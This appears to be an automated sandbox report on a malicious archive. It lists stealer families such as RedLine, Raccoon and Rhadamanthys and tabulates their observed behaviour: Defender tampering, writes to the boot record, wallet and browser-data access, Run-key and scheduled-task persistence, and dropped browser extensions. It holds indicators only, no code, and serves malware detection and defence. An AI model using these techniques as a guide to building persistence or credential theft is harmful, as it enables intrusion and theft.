Analysis Overview
SHA256
4c7081148a218b609dca62b2ce1106e4a2e075671b0fb64352056cd6e58e7873
Threat Level: Known bad
The file infected.zip was found to be: Known bad.
Malicious Activity Summary
RedLine payload
Modifies Windows Defender Real-time Protection settings
Vidar
Rhadamanthys
Raccoon
Windows security bypass
GCleaner
RedLine
PureCrypter
Detect rhadamanthys stealer shellcode
Suspicious use of NtCreateUserProcessOtherParentProcess
ACProtect 1.3x - 1.4x DLL software
Executes dropped EXE
Blocklisted process makes network request
Downloads MZ/PE file
UPX packed file
Uses the VBS compiler for execution
Reads user/profile data of web browsers
Checks BIOS information in registry
Loads dropped DLL
Checks computer location settings
Writes to the Master Boot Record (MBR)
Drops desktop.ini file(s)
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Adds Run key to start application
Drops Chrome extension
Accesses 2FA software files, possible credential harvesting
Looks up external IP address via web service
Checks for any installed AV software in registry
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Modifies registry class
Modifies data under HKEY_USERS
Checks processor information in registry
Delays execution with timeout.exe
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Runs ping.exe
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-15 17:12
Signatures
Analysis: behavioral10
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:17
Platform
win10v2004-20220812-en
Max time kernel
212s
Max time network
225s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
GCleaner
Raccoon
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3996 created 2468 | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe | C:\Windows\system32\taskhostw.exe |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\ScanRename\ScanRename.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InfoInstall = "C:\\Users\\Admin\\AppData\\Roaming\\InfoInstall\\InfoInstall.exe" | C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Windows\SysWOW64\is-752BJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3996 set thread context of 1952 | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Any Drive Formatter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\OdCkbftzuRPDCLooswR\xprHIYg.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-DL9FL.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-SM4I8.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-N3B0G.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Documentation\Russian\is-U0NO9.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Languages\is-TJ8E5.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-3LBDQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-HVIUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-EP9NM.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-JJNEH.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-B9TM5.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-3UEPQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File created | C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-23HT1.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-2L7CS.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-4O43K.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Documentation\English\is-NUOFE.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-0OITV.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-06SNK.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-QQUHA.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\unWhUoTpcLxwC\BoOieqA.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\NxGlAgQUfzUn\PlxUODa.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-B4BFK.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-6KBKJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-4QSVS.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\cjNumber | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-F7CVS.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\WyuevociGfNU2\AzXfaRieDbpAf.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-109K0.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-TFLMS.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-CQUMN.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-17VQJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Reg Organizer\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-QVMD2.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-44H7C.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-JV0OQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-TNG86.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\ScanRename\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\ScanRename\ScanRename.exe | C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp | N/A |
| File created | C:\Program Files (x86)\XxxUzwYQU\zfRebA.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-7OO28.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-HTHBB.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-M0UH9.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-67BUK.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-GORKS.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-LN7NC.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-NHVQB.tmp | C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-R7RB9.tmp | C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\YQwpFizkoQMsJvRhq.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\bGAvhKhnIPTNQeobsw.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\YESfVrKgbFKcjSeIN.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\iwOiVBtjWoVYUMW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\SysWOW64\fontview.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\SysWOW64\fontview.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\fontview.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\fontview.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\fontview.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
